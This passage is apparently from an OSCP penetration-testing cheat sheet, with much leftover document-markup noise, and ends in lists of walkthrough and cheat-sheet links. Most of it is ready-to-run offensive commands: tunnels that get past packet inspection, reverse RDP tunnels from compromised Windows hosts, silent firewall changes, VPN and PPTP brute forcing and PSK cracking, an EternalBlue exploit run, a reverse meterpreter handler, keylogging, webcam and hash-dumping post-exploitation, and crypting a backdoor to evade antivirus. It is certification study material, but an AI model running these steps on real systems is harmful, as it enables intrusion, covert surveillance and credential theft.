$ip/24`<text:line-break/><text:line-break/>-<text:s text:c="3"/>HTTP Tunneling<text:s text:c="2"/><text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`nc -vvn $ip 8888`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Traffic Encapsulation - Bypassing deep packet inspection<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>http tunnel<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>On server side:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`sudo hts -F &lt;server ip addr&gt;:&lt;port of your app&gt; 80<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>On client side:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`sudo htc -P &lt;my proxy.com:proxy port&gt; -F &lt;port of your app&gt; &lt;server ip addr&gt;:80 stunnel`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Tunnel Remote Desktop (RDP) from a Popped Windows machine to your<text:line-break/><text:s text:c="4"/>network<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Tunnel on port 22<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`plink -l root -pw pass -R 3389:&lt;localhost&gt;:3389 &lt;remote host&gt;`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Port 22 blocked? Try port 80? or 443?<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:&lt;local host&gt;:3389 &lt;remote host&gt; -P80`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel<text:line-break/><text:s text:c="4"/>(bypass deep packet inspection)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Windows machine add required firewall rules without prompting the user<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Start the http tunnel client<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="9"/>`httptunnel_client.exe`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create HTTP reverse shell by connecting to localhost port 3000<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`plink -l root -pw 23847sd98sdf987sf98732 -R 3389:&lt;local host&gt;:3389 &lt;remote host&gt; -P 3000`<text:line-break/><text:line-break/>-<text:s text:c="3"/>VLAN Hopping<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`git clone https://github.com/nccgroup/vlan-hopping.git<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>chmod 700 frogger.sh<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>./frogger.sh`<text:line-break/><text:s text:c="8"/><text:line-break/><text:line-break/>-<text:s text:c="3"/>VPN Hacking<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Identify VPN servers:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`./udp-protocol-scanner.pl -p ike $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Scan a range for VPN servers:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`./udp-protocol-scanner.pl -p ike -f ip.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Use IKEForce to enumerate or dictionary attack VPN servers:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`pip install pyip`<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`git clone https://github.com/SpiderLabs/ikeforce.git<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Perform IKE VPN enumeration with IKEForce:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Bruteforce IKE VPN using IKEForce:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>Use ike-scan to capture the PSK hash:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`ike-scan<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ike-scan TARGET-IP<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ike-scan -A TARGET-IP<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>Use psk-crack to crack the PSK hash<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`psk-crack hash-file.txt<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>pskcrack<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>psk-crack -b 5 TARGET-IPkey<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>psk-crack -d /path/to/dictionary-file TARGET-IP-key`<text:line-break/><text:line-break/>-<text:s text:c="3"/>PPTP Hacking<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Identifying PPTP, it listens on TCP: 1723<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>NMAP PPTP Fingerprint:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`nmap –Pn -sV -p 1723 TARGET(S)<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>PPTP Dictionary Attack<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Port Forwarding/Redirection<text:line-break/><text:line-break/>-<text:s text:c="3"/>PuTTY Link tunnel - SSH Tunneling<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Forward remote port to local address:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="9"/>`plink.exe -P 22 -l root -pw "1337" -R 445:&lt;local host&gt;:445 &lt;remote host&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>SSH Pivoting<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SSH pivoting from one network to another:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`ssh -D &lt;local host&gt;:1010 -p 22 user@&lt;remote host&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>DNS Tunneling<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Attacking Machine Installation:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`apt-get update<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>apt-get -y install ruby-dev git make g++<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>gem install bundler<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>git clone https://github.com/iagox86/dnscat2.git<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cd dnscat2/server<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>bundle install`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run dnscat2:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`ruby ./dnscat2.rb<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>dnscat2&gt; New session established: 1422<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>dnscat2&gt; session -i 1422`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Target Machine:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>https://downloads.skullsecurity.org/dnscat2/<text:line-break/><text:s text:c="8"/>https://github.com/lukebaggett/dnscat2-powershell/<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`dnscat --host &lt;dnscat server ip&gt;`<text:line-break/><text:line-break/>&lt;span id="_ujpvtdpc9i67" class="anchor"&gt;&lt;span id="_Toc480741824" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;The Metasploit Framework<text:line-break/>======================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>See [*Metasploit Unleashed<text:line-break/><text:s text:c="4"/>Course*](https://www.offensive-security.com/metasploit-unleashed/)<text:line-break/><text:s text:c="4"/>in the Essentials<text:line-break/><text:line-break/>-<text:s text:c="3"/>Search for exploits using Metasploit GitHub framework source code:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Translate them for use on OSCP LAB or EXAM.<text:line-break/><text:line-break/>-<text:s text:c="3"/>Metasploit<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>MetaSploit requires Postfresql<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`systemctl start postgresql`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>To enable Postgresql on startup<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`systemctl enable postgresql`<text:line-break/><text:line-break/>-<text:s text:c="3"/>MSF Syntax<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Start metasploit<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`msfconsole<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`msfconsole -q`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show help for command<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`show -h`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show Auxiliary modules<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`show auxiliary`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Use a module<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`use auxiliary/scanner/snmp/snmp_enum<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>use auxiliary/scanner/http/webdav_scanner<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>use auxiliary/scanner/smb/smb_version<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>use auxiliary/scanner/ftp/ftp_login<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>use exploit/windows/pop3/seattlelab_pass`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show the basic information for a module<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`info`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show the configuration parameters for a module<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`show options`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Set options for a module<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`set RHOSTS 192.168.1.1-254<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>set THREADS 10`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run the module<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`run`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Execute an Exploit <text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`exploit`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Search for a module<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="7"/>`search type:auxiliary login`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Metasploit Database Access<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Show all hosts discovered in the MSF database<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`hosts`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Scan for hosts and store them in the MSF database<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`db_nmap`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Search machines for specific ports in MSF database <text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`services -p 443`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Leverage MSF database to scan SMB ports (auto-completed rhosts)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`services -p 443 --rhosts`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Staged and Non-staged<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Non-staged payload - is a payload that is sent in its entirety in one go<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Staged - sent in two parts<text:s text:c="2"/>Not have enough buffer space<text:s text:c="2"/>Or need to bypass antivirus<text:line-break/> <text:line-break/> -<text:s text:c="3"/>MS 17-010 - EternalBlue<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue).<text:s text:c="2"/>Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box.<text:s text:c="2"/>I have never had much luck using the built in Metasploit EternalBlue module.<text:s text:c="2"/>I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:<text:line-break/><text:s text:c="4"/>https://www.youtube.com/watch?v=4OHLor9VaRI<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>1. First step is to configure the Kali to work with wine 32bit<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32<text:line-break/><text:s text:c="6"/>rm -r ~/.wine<text:line-break/><text:s text:c="6"/>wine cmd.exe<text:line-break/><text:s text:c="6"/>exit`<text:line-break/><text:s text:c="12"/><text:line-break/><text:s text:c="6"/>2. Download the exploit repostory<text:line-break/><text:s text:c="6"/>https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb<text:line-break/><text:line-break/><text:s text:c="6"/>4. Start metasploit console<text:line-break/><text:s text:c="6"/><text:line-break/><text:line-break/>I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.<text:line-break/><text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`use exploit/windows/smb/eternalblue_doublepulsar<text:line-break/><text:s text:c="6"/>msf exploit(eternalblue_doublepulsar) &gt; set RHOST 10.10.10.10<text:line-break/><text:s text:c="6"/>RHOST =&gt; 10.11.1.73<text:line-break/><text:s text:c="6"/>msf exploit(eternalblue_doublepulsar) &gt; set PROCESSINJECT spoolsv.exe<text:line-break/><text:s text:c="6"/>PROCESSINJECT =&gt; spoolsv.exe<text:line-break/><text:s text:c="6"/>msf exploit(eternalblue_doublepulsar) &gt; run`<text:line-break/><text:s text:c="6"/><text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Experimenting with Meterpreter<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Get system information from Meterpreter Shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`sysinfo`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Get user id from Meterpreter Shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`getuid`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Search for a file<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`search -f *pass*.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Upload a file<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Download a file<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Invoke a command shell from Meterpreter Shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`shell`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Exit the meterpreter shell<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`exit`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Metasploit Exploit Multi Handler<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>multi/handler to accept an incoming reverse\_https\_meterpreter<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`payload<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>use exploit/multi/handler<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>set PAYLOAD windows/meterpreter/reverse_https<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>set LHOST $ip<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>set LPORT 443<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>exploit<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*] Started HTTPS reverse handler on https://$ip:443/`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Building Your Own MSF Module<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`mkdir -p ~/.msf4/modules/exploits/linux/misc<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cd ~/.msf4/modules/exploits/linux/misc<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cp<text:line-break/><text:s text:c="8"/>/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb<text:line-break/><text:s text:c="8"/>./crossfire.rb<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>nano crossfire.rb`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`download` Download a file or directory<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`upload` Upload a file or directory<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`portfwd` Forward a local port to a remote service<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`route` View and modify the routing table<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`keyscan_start` Start capturing keystrokes<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`keyscan_stop` Stop capturing keystrokes<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`screenshot` Grab a screenshot of the interactive desktop<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`record_mic` Record audio from the default microphone for X seconds<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`webcam_snap` Take a snapshot from the specified webcam<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`getsystem` Attempt to elevate your privilege to that of local system.<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`hashdump` Dumps the contents of the SAM database<text:line-break/><text:line-break/>-<text:s text:c="3"/>Meterpreter Post Exploitation Features<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a Meterpreter background session<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`background`<text:line-break/><text:line-break/>&lt;span id="_51btodqc88s2" class="anchor"&gt;&lt;span id="_Toc480741825" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Bypassing Antivirus Software <text:line-break/>===========================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Crypting Known Malware with Software Protectors<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>One such open source crypter, called Hyperion<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`cp /usr/share/windows-binaries/Hyperion-1.0.zip<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>unzip Hyperion-1.0.zip<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cd Hyperion-1.0/<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>wine hyperion.exe ../backdoor.exe ../crypted.exe`<text:line-break/><text:line-break/><text:line-break/>OSCP Course Review<text:line-break/>================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Offensive Security’s PWB and OSCP — My Experience<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>OSCP Journey<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Down with OSCP<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Jolly Frogs - Tech Exams (Very thorough)<text:line-break/><text:line-break/>[*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)<text:line-break/><text:line-break/>&lt;span id="_pxmpirqr11x0" class="anchor"&gt;&lt;span id="_Toc480741798" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;OSCP Inspired VMs and Walkthroughs<text:line-break/>================================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>[*https://www.vulnhub.com/*](https://www.vulnhub.com/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.root-me.org/*](https://www.root-me.org/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Walk through of Tr0ll-1 - Inspired by on the Trolling found in the<text:line-break/><text:s text:c="4"/>OSCP exam<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Another walk through for Tr0ll-1<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Taming the troll - walkthrough<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Troll download on Vuln Hub<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Sickos - Walkthrough:<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Sickos - Inspired by Labs in OSCP<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.vulnhub.com/series/*](https://www.vulnhub.com/series/sickos,70/)[sickos](https://www.vulnhub.com/series/sickos,70/)[*,70/*](https://www.vulnhub.com/series/sickos,70/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Lord of the Root Walk Through<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Lord Of The Root: 1.0.1 - Inspired by OSCP<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Tr0ll-2 Walk Through<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Tr0ll-2<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)<text:line-break/><text:line-break/>&lt;span id="_kfwx4om2dsj4" class="anchor"&gt;&lt;span id="_Toc480741799" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Cheat Sheets<text:line-break/>==========================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>Penetration Tools Cheat Sheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Pen Testing Bookmarks<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)<text:line-break/><text:line-break/>-<text:s text:c="3"/>OSCP Cheatsheets<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)<text:line-break/><text:line-break/>-<text:s text:c="3"/>CEH Cheatsheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Net Bios Scan Cheat Sheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Reverse Shell Cheat Sheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>NMap Cheat Sheet<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Linux Commands Cheat Sheet<text:s text:c="2"/><text:line-break/><text:s 